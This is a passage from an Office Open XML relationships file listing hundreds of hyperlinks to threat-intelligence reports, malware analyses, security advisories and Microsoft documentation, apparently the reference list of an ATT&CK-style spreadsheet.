Target="https://torrentfreak.com/anonymous-hackers-deface-russian-govt-site-to-protest-web-blocking-nsfw-180512/" TargetMode="External"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf" TargetMode="External"/><Relationship Id="rId426" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://confluence.atlassian.com/confkb/how-to-enable-command-line-audit-logging-in-linux-956166545.html" TargetMode="External"/><Relationship Id="rId633" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://insights.sei.cmu.edu/cert/2019/09/the-dangers-of-vhd-and-vhdx-files.html" TargetMode="External"/><Relationship Id="rId980" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dstepanic/attck_empire" TargetMode="External"/><Relationship Id="rId1056" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/scottlundgren/w32time" TargetMode="External"/><Relationship Id="rId1263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kifarunix.com/scheduling-tasks-using-at-command-in-linux/" TargetMode="External"/><Relationship Id="rId2107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redcanary.com/blog/rclone-mega-extortion/" TargetMode="External"/><Relationship Id="rId2314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack" TargetMode="External"/><Relationship Id="rId2661" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/" TargetMode="External"/><Relationship Id="rId2759" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/" TargetMode="External"/><Relationship Id="rId2966" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does" TargetMode="External"/><Relationship Id="rId840" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html" TargetMode="External"/><Relationship Id="rId938" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider" TargetMode="External"/><Relationship Id="rId1470" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" TargetMode="External"/><Relationship Id="rId1568" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8625" TargetMode="External"/><Relationship Id="rId1775" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d" TargetMode="External"/><Relationship Id="rId2521" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/bb490886.aspx" TargetMode="External"/><Relationship Id="rId2619" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html" TargetMode="External"/><Relationship Id="rId2826" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilities" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity" TargetMode="External"/><Relationship Id="rId700" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdf" TargetMode="External"/><Relationship Id="rId1123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc" TargetMode="External"/><Relationship Id="rId1330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html" TargetMode="External"/><Relationship Id="rId1428" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/" TargetMode="External"/><Relationship Id="rId1635" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/previous-versions/windows/desktop/Policy/filtering-the-scope-of-a-gpo" TargetMode="External"/><Relationship Id="rId1982" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/black-t-cryptojacking-variant/" TargetMode="External"/><Relationship Id="rId3088" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction" TargetMode="External"/><Relationship Id="rId1842" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/" TargetMode="External"/><Relationship Id="rId1702" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460" TargetMode="External"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/ncas/analysis-reports/ar20-133b" TargetMode="External"/><Relationship Id="rId490" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/" TargetMode="External"/><Relationship Id="rId2171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" TargetMode="External"/><Relationship Id="rId3015" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://themittenmac.com/what-does-apt-activity-look-like-on-macos/" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins" TargetMode="External"/><Relationship Id="rId350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3" TargetMode="External"/><Relationship Id="rId588" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.secureworks.com/cyber-threat-intelligence/threats/sakula-malware-family/" TargetMode="External"/><Relationship Id="rId795" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/" TargetMode="External"/><Relationship Id="rId2031" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware" TargetMode="External"/><Relationship Id="rId2269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/threat-profiles/gold-cabin" TargetMode="External"/><Relationship Id="rId2476" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html" TargetMode="External"/><Relationship Id="rId2683" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/" TargetMode="External"/><Relationship Id="rId2890" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-do-not-allow-anonymous-enumeration-of-sam-accounts-and-shares" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://o365blog.com/post/devices/" TargetMode="External"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/swlh/investigating-the-use-of-vhd-files-by-cybercriminals-3f1f08304316" TargetMode="External"/><Relationship Id="rId448" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" TargetMode="External"/><Relationship Id="rId655" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://eclecticlight.co/2020/10/24/theres-more-to-files-than-data-extended-attributes/" TargetMode="External"/><Relationship Id="rId862" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html" TargetMode="External"/><Relationship Id="rId1078" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://googleblog.blogspot.com/2011/06/ensuring-your-information-is-safe.html" TargetMode="External"/><Relationship Id="rId1285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/" TargetMode="External"/><Relationship Id="rId1492" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sebdraven.medium.com/babuk-is-distributed-packed-78e2f5dd2e62" TargetMode="External"/><Relationship Id="rId2129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redcanary.com/blog/clipping-silver-sparrows-wings/" TargetMode="External"/><Relationship Id="rId2336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://news.softpedia.com/news/cryptocurrency-mining-malware-discovered-targeting-seagate-nas-hard-drives-508119.shtml" TargetMode="External"/><Relationship Id="rId2543" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/bb490968.aspx" TargetMode="External"/><Relationship Id="rId2750" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/" TargetMode="External"/><Relationship Id="rId2988" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/" TargetMode="External"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/" TargetMode="External"/><Relationship Id="rId515" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers" TargetMode="External"/><Relationship Id="rId722" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/" TargetMode="External"/><Relationship Id="rId1145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://itsyndicate.org/blog/disabling-dangerous-php-functions/" TargetMode="External"/><Relationship Id="rId1352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html" TargetMode="External"/><Relationship Id="rId1797" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/ee791851(v=ws.11)?redirectedfrom=MSDN" TargetMode="External"/><Relationship Id="rId2403" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage" TargetMode="External"/><Relationship Id="rId2848" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/walmartglobaltech/vba-stomping-advanced-maldoc-techniques-612c484ab278" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/LordNoteworthy/al-khaser/tree/master/al-khaser/AntiDebug" TargetMode="External"/><Relationship Id="rId1005" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump" TargetMode="External"/><Relationship Id="rId1212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/dridex-a-history-of-evolution/78531/" TargetMode="External"/><Relationship Id="rId1657" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols" TargetMode="External"/><Relationship Id="rId1864" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter" TargetMode="External"/><Relationship Id="rId2610" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html" TargetMode="External"/><Relationship Id="rId2708" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/lapsus-group/" TargetMode="External"/><Relationship Id="rId2915" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/" TargetMode="External"/><Relationship Id="rId1517" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v%3Dws.11)" TargetMode="External"/><Relationship Id="rId1724" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/?p=556" TargetMode="External"/><Relationship Id="rId1931" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/" TargetMode="External"/><Relationship Id="rId3037" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://objective-see.com/blog/blog_0x3B.html" TargetMode="External"/><Relationship Id="rId2193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.stigviewer.com/stig/oracle_linux_5/2016-12-20/finding/V-22383" TargetMode="External"/><Relationship Id="rId2498" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html" TargetMode="External"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentestlab.blog/2012/10/30/attacking-vnc-servers/" TargetMode="External"/><Relationship Id="rId372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices" TargetMode="External"/><Relationship Id="rId677" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/" TargetMode="External"/><Relationship Id="rId2053" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-target" TargetMode="External"/><Relationship Id="rId2260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/bronze-president-targets-ngos" TargetMode="External"/><Relationship Id="rId2358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://posts.specterops.io/azure-privilege-escalation-via-service-principal-abuse-210ae2be2a5" TargetMode="External"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/docs/us-15/materials/us-15-Choi-API-Deobfuscator-Resolving-Obfuscated-API-Functions-In-Modern-Packers.pdf" TargetMode="External"/><Relationship Id="rId884" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2013/08/njw0rm-brother-from-the-same-mother.html" TargetMode="External"/><Relationship Id="rId2120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.recordedfuture.com/turla-apt-infrastructure/" TargetMode="External"/><Relationship Id="rId2565" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.technospot.net/blogs/block-chrome-extensions-using-google-chrome-group-policy-settings/" TargetMode="External"/><Relationship Id="rId2772" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/" TargetMode="External"/><Relationship Id="rId537" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html" TargetMode="External"/><Relationship Id="rId744" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pages.endgame.com/rs/627-YBU-612/images/EndgameJournal_The%20Masquerade%20Ball_Pages_R2.pdf" TargetMode="External"/><Relationship Id="rId951" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=fXthwl6ShOg" TargetMode="External"/><Relationship Id="rId1167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/" TargetMode="External"/><Relationship Id="rId1374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/library/tzat5yw6.aspx" TargetMode="External"/><Relationship Id="rId1581" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-credenumeratea" TargetMode="External"/><Relationship Id="rId1679" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://support.microsoft.com/kb/2962486" TargetMode="External"/><Relationship Id="rId2218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign" TargetMode="External"/><Relationship Id="rId2425" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/connect/blogs/cve-2012-1875-exploited-wild-part-1-trojannaid" TargetMode="External"/><Relationship Id="rId2632" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research/19/l/waterbear-is-back-uses-api-hooking-to-evade-security-product-detection.html" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.adlice.com/userland-rootkits-part-1-iat-hooks/" TargetMode="External"/><Relationship Id="rId604" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/" TargetMode="External"/><Relationship Id="rId811" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf" TargetMode="External"/><Relationship Id="rId1027" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mattifestation/PoCSubjectInterfacePackage" TargetMode="External"/><Relationship Id="rId1234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/qakbot-technical-analysis/103931/" TargetMode="External"/><Relationship Id="rId1441" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/media/17826" TargetMode="External"/><Relationship Id="rId1886" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech" TargetMode="External"/><Relationship Id="rId2937" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html" TargetMode="External"/><Relationship Id="rId909" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html" TargetMode="External"/><Relationship Id="rId1301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/" TargetMode="External"/><Relationship Id="rId1539" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-6" TargetMode="External"/><Relationship Id="rId1746" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx" TargetMode="External"/><Relationship Id="rId1953" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.apple.com/guide/mac-help/open-items-automatically-when-you-log-in-mh15189/mac" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks" TargetMode="External"/><Relationship Id="rId1606" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/library/ms677626.aspx" TargetMode="External"/><Relationship Id="rId1813" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/ms687393" TargetMode="External"/><Relationship Id="rId3059" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sentinelone.com/blog/how-malware-persists-on-macos/" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/?p=4277" TargetMode="External"/><Relationship Id="rId394" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.clearskysec.com/oilrig/" TargetMode="External"/><Relationship Id="rId2075" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://purplesec.us/data-loss-prevention/" TargetMode="External"/><Relationship Id="rId2282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/threat-profiles/iron-twilight" TargetMode="External"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf" TargetMode="External"/><Relationship Id="rId699" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf" TargetMode="External"/><Relationship Id="rId1091" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gibnc.group-ib.com/s/Group-IB_GrimAgent_analysis" TargetMode="External"/><Relationship Id="rId2587" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/" TargetMode="External"/><Relationship Id="rId2794" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat" TargetMode="External"/><Relationship Id="rId461" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/" TargetMode="External"/><Relationship Id="rId559" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.justice.gov/usao-ndca/pr/san-jose-man-pleads-guilty-damaging-cisco-s-network" TargetMode="External"/><Relationship Id="rId766" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://outflank.nl/blog/2019/05/05/evil-clippy-ms-office-maldoc-assistant/" TargetMode="External"/><Relationship Id="rId1189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.joesecurity.org/blog/498839998833561473" TargetMode="External"/><Relationship Id="rId1396" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2022/08/24/magicweb-nobeliums-post-compromise-trick-to-authenticate-as-anyone/" TargetMode="External"/><Relationship Id="rId2142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.thepythoncode.com/article/executing-bash-commands-remotely-in-python" TargetMode="External"/><Relationship Id="rId2447" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan" TargetMode="External"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.certfa.com/posts/charming-kitten-christmas-gift/" TargetMode="External"/><Relationship Id="rId419" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cofense.com/nanocore-rat-resurfaced-sewers/" TargetMode="External"/><Relationship Id="rId626" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.docker.com/engine/api/v1.41/" TargetMode="External"/><Relationship Id="rId973" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc8191" TargetMode="External"/><Relationship Id="rId1049" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/outflankbv/NetshHelperBeacon" TargetMode="External"/><Relationship Id="rId1256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.contextis.com/blog/comma-separated-vulnerabilities" TargetMode="External"/><Relationship Id="rId2002" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/threat-assessment-ekans-ransomware/" TargetMode="External"/><Relationship Id="rId2307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sentinelone.com/labs/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/" TargetMode="External"/><Relationship Id="rId2654" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/" TargetMode="External"/><Relationship Id="rId2861" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Booting" TargetMode="External"/><Relationship Id="rId2959" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/chasing-avaddon-ransomware" TargetMode="External"/><Relationship Id="rId833" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://content.fireeye.com/apt-41/rpt-apt41" TargetMode="External"/><Relationship Id="rId1116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464" TargetMode="External"/><Relationship Id="rId1463" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://securityaffairs.co/wordpress/65318/hacking/dde-attack-apt28.html" TargetMode="External"/><Relationship Id="rId1670" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/dn408187.aspx" TargetMode="External"/><Relationship 